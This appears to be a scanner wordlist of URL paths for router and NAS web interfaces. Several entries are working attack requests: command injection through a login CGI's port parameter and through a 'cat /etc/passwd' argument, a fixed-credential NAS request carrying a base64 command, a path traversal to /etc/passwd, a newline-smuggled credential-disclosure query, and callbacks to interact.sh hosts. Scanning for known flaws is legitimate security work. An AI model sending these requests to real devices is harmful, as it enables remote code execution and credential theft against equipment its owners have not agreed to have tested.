/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/getcfg.php
/wan.htm
/ddns_check.ccp
/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}
/cgi-bin/ExportSettings.sh
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/config/getuser?index=0
/apply.cgi
/category_view.php
/folder_view.php
/cgi-bin/webproc
/status.php
/hedwig.cgi
/cgi-bin/info.cgi
/info.php?RESULT=\
/messages
/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1
/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSLVPN
